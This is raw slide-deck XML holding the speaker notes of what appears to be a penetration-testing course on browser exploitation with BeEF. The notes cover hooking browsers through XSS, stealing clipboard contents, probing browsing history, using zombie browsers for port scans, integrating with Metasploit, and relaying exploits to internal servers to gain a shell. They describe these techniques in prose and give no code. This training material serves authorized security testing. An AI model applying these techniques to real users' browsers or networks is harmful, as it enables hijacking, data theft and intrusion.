                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This screenshot is of the BeEF control interface.  On the left side you can see the menu options and the list of zombies under this attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s control.  On the right is the panes that will show the command you wish to run and the results from this command.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31949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BeEF interface is controlled via web interface.  This interface provides a series of panels to interact with the pieces we need for our exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The first panel is a list of the zombie browser, both the ones offline and online.  For the offline ones, BeEF will cache the commands and issue them when the browser reconnects!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The next panel is a list of modules available.  Each module is color coded based on the zombie selected.  This color coding signifies the reliability and functionality of the module against that target.  When we select a module, the panels to the right will list the description and the configuration options.  We can then press the execute button to send the command to the browser victim.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31949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D7CDB35-1883-7C4E-BCAE-3B5D410A7AA2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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ACCD1AA-A1A8-964C-B058-0EB1BCE70C22}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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When we want to use BeEF to control a zombie browser, we inject the hook.js file via an XSS flaw.  When the victim loads the page with the exploit, their browser is connected back to the BeEF controller.  The pentester can then issue commands back to the victim browser.  This is done through the hook.js file, which is changed based on the commands we want to send.</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4FCD74F-FDB6-3945-BBFE-97FDE3E36305}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321539"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ln w="9525"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="174625" indent="-174625">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>BeEF contains the following capabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Controlling Zombies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="2" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Autorun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="2" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Clipboard Stealing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="2" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>JavaScript Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="2" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Request Initiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="2" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>History Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Port Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Browser Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Inter-Protocol Exploitation</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5F25080-CE1C-3D4C-B47E-4732AC838519}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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module will retrieve the contents of the clipboard for the attacker.  Once the data is retrieved, its sent back to the controller server.  This module is abusing a feature of IE 6 and earlier where JavaScript can access this without prompting the user.  IE 7+ still allows this, but the user is prompted.</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F2563F92-5C78-4B42-B832-FF459AE2B4A9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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module will send a list of urls to the zombie and then return if that client has accessed them.  As we have discussed earlier today, this allows us to fingerprint the victims, map their infrastructure and determine potential sites to use in other attacks.</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F0DA03E-0B27-5D46-A39D-E3EFCDB5FEE0}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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module will direct the zombie to request a page.  This could be used to download software to the machine.  It could also be used to send the client to a specific site, either to click on ads for revenue or to perform a DoS attack by overwhelming the web server with requests.</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A895AD2F-59D3-384E-9063-105D6620F60D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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BeEF includes an interesting port scanner, which can conduct network port scans using distributed zombies.  This means that with enough zombies, the attacker could have each one request a single port.  What IDS is tuned to catch that?!?</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32665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current versions of BeEF, the ability to connect with Metasploit has been added.  The BeEF controller connects to Metasploit via an RPC connection and loads the available exploits and payloads.  We are able to select the attack to deliver and BeEF will inject an iframe pointing to the Metasploit attack.  BeEF does allow us to use the Metasploit Browser AutoPWN, which delivers every exploit until access is gained.  This is not recommended as it isn't really stable and can cause issues during a test.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32666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D72CC7B9-42F5-0A48-8887-0A28A51D91F5}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32768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Attackers can use BeEF to communicate and exploit other protocols.  For example, BeEF contains the module to communicate and exploit an Asterisk VoIP server.  It can communicate with a wide variety of services and it is simple to port Metasploit exploits to BeEF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many protocols are forgiving in regards to understanding the requests coming from clients.  Because of this forgiveness, BeEF can abuse it.  BeEF sends HTTP requests that contain the various protocols in the payload.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32768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EBA47886-9780-E842-8D30-B2E74F0846FC}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200"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683AE8B-4D09-3E43-BCAC-EBF5BA3E1CD7}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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As we'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ve discussed previously, authentication bypass is when the attacker can access resources which require authentication without actually authenticating.   This allows the attacker to gain access to portions of the application or data the target is trying to protect.  Depending on the exposed portions, this can be a very critical issue in a web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>When a tester finds an authentication bypass issue, they need to determine what it provides access too.  Can they get to the whole site or just a portion of it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284675" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln w="9525"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Here is the steps we follow to perform the inter-protocol exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>BeEF's XSS stub is injected into the XSS flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Client accesses the vulnerable web application and BeEF hooks the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Browser reports to the BeEF controller and awaits commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>The attacker accesses the BeEF controller t view the available zombies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32870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497138A7-E978-F94C-81C7-61008238C4A6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">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Here is a screenshot of the BeEF interface where the exploit is selected and configured.  This is the exploit that is delivered through the inter-protocol communication.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32973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F6F09A37-BD4C-614D-9A1F-CE38C77E11C9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288771" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln w="9525"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>In this diagram we continue the process for exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>The attacker tells the victim browser to deliver the exploit to the internal server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>The victim exploits the internal server, delivering the shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" indent="-177800">
              <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>The attacker then instructs the shell through the client browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33075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6516191-D6C2-0342-8593-3AD0C73D7DA1}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33177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screenshot shows the interface to send the commands through the victim browser.  The results are then visible within the Zombies menu.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33178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6E65207-B73D-114D-B64B-BA2503A27AF8}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33280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In this next exercise we will explore the BeEF interface.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33280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45209B5-C4CC-2948-854A-6DD25F8315A2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33792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next section will explore various ways to limit the XSS attacks we perform.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33792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BBB1CAF-C867-3944-8C39-FF4648C56311}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338947" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974725" y="4595813"/>
            <a:ext cx="5426075" cy="43195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pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Since we are not actually malicious attackers, we need to have methods to limit which client machines are in-scope for the test.  We have to add intelligence to either the attack script or the delivery mechanism to handle this. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that these methods to limit scope are not fail-proof, but they provide the best chance at preventing misdirected attacks.  There are five possibilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="344488" lvl="1" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client-side code with Java Applet identifying IP addr</a:t>
            </a:r>
